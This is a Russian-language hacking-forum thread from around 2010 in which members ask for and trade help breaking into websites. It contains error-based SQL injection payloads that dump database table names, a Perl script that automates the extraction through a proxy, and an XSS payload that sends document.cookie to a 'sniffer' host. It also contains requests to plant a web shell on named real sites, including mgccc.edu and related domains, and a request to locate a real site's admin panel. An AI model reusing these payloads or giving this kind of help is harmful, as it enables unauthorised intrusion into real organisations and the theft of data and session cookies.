Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://newsmarked.info/userrss.php?user=hiioarvey&status=1'
    не могу раскрутить
     
  2. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    daniel_1024спасибо! разобрался
    пароли храняца в /home/admin/.shadow
     
  3. just_panic

    just_panic New Member

    Joined:
    5 Jun 2010
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    Привет всем. Что можно сделать с этим?
    Code:
    warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.
    
     
  4. legaljo

    legaljo Member

    Joined:
    27 Jul 2010
    Messages:
    195
    Likes Received:
    26
    Reputations:
    7
    Это читалка, ничего с этим не сделаешь..
     
  5. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    очень заинтересован базой одной сайты (инфа плтная).
    адрес допустим такой:
    http://site.aa.su/
    если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/
    т.е. никаких файлов нету, чтоб мне понять что к чему.
    сайт самописный.

    Как узнать что за БД ?? и возможноси проникновения ?
     
  6. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта.
    Если совсем глухо и не получается сломать из веба, сканируй открытые порты, смотри, что на них висит, коннекться к ним телнетом, чтобы узнать версии демонов и ищи под них эксплойты.
    То, что ты описал, называется Mod_Rewrite.
     
    3 people like this.
  7. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    есть запрос
    Code:
    +and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+[COLOR=Red]206[/COLOR],1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
    как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
    есть ли возможность вывести весь список таблиц в блайнд-скуле?
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    юзай havij, лимитом перебирает все, а так груп конкат не юзать все равно )
     
    _________________________
    2 people like this.
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Не знаю чем и как делать :((
    никак не получаеться. я думаю специально сделали на домене 3_го уровня, чтоб невозможно было даже IP адрес ловить. встроенные утилиты wind ничего не могут определить(ping, nslookup, tracert), т.е. IP адрес.
    А вот XSpider тоже молчит ****:
     
  10. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    ок. попробую.
    а что на счёт бенчмарка с переменными? типа
    Code:
    concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCAT(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by table_name+LIMIT+1))),@o)
    никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?
     
  11. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Все равно вывести все таблицы за один запрос в ошибке не получиться, так как, метод floor rand - имеет ограничение в 64 символа, а метод основанный на выборке записи по средствам XPath - 31 символ.
     
    4 people like this.
  12. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Привет, как узнать полный путь у www папке на сайте http://www.mgccc.edu/ ? При наличии LOAD_FILE, есть ли какие-то брутфорсные варианты подбора папки? Например, софт, который пробует стандартные структуры папок?
     
  13. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Возможно ли залить шелл, если есть инъекция, кавычки НЕ экранируются, известен путь к сайту, но на сайте нету папок, в которые муксул может писать? В конфиге обнаружен логин-пароль юзера дб (удаленно не подключается), вроде как админки нету на сайте. Сайт тот же, что и в предыдущем посте: http://www.mgccc.edu/ На том же серваке лежат http://www.mississippibowl.com, http://www.mississippibowl.org, http://www.msbowl.com, http://www.mgcccbulldogs.com, http://www.saccr.org, и их файлы принадлежат одному юзеру. Если кто-то найдет и ткнет в форму уплоада носом, будет просто отлично :)
     
  14. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Помогите, пожалуйста, найти админку в http://www.followyourheart.com/
     
  15. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    http://followyourheart.com/news/wp-login.php

    Word press
     
    2 people like this.
  16. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Code:
    #!/usr/bin/perl -w
    # target
    use LWP::UserAgent;
    $ua = LWP::UserAgent->new;
    
    my $proxy="http://xx.xxx.xxx.xxx:port"; # proxy
    $ua->proxy(['http','https'],$proxy);
    
    my $i=0;
    while(1)
    {
     my $req = HTTP::Request->new(GET => "http://[host][path]/?variable=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+SCHEMA_NAME+FROM+information_schema.SCHEMATA+limit+$i,1),floor(rand(0)*2)))--+");
     my $res = $ua->request($req);
    
     if ($res->as_string =~ /Duplicate entry(.+)for/)
     {
     open(FILE,'>>results.txt');
     print "print $i: $1\n";
     print FILE "$1\n";
     close(FILE);
     $i++;
     }
      else {last;}
    }
    :) ну под себя не сложно подмутить.
     
    #14756 Strilo4ka, 6 Sep 2010
    Last edited: 6 Sep 2010
    2 people like this.
  17. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    все таки хотел узнать такие домены как: http://site.com.su/ трудно расковырять? и это выбирается в целях безопасности?
    скачал JBroFuzz для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось :)))))))
     
  18. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Почитай вот это: https://forum.antichat.ru/thread228319.html
     
    #14758 h00lyshit!, 7 Sep 2010
    Last edited: 2 Mar 2011
    1 person likes this.
  19. p0deje

    p0deje New Member

    Joined:
    29 Aug 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Reflected XSS и magic_quotes_gpc

    Есть пассивная XSS вида
    Code:
    ?file=<img src="http://sniffer/evliimage.gif?"+document.cookie>
    Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида
    Code:
    <script src=http://sniffer/evilcode.hs></script>
     
  20. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    Redwood, а можешь залить куда-нибудь MaxPatrol, а то все ссылки битые
     
Thread Status:
Not open for further replies.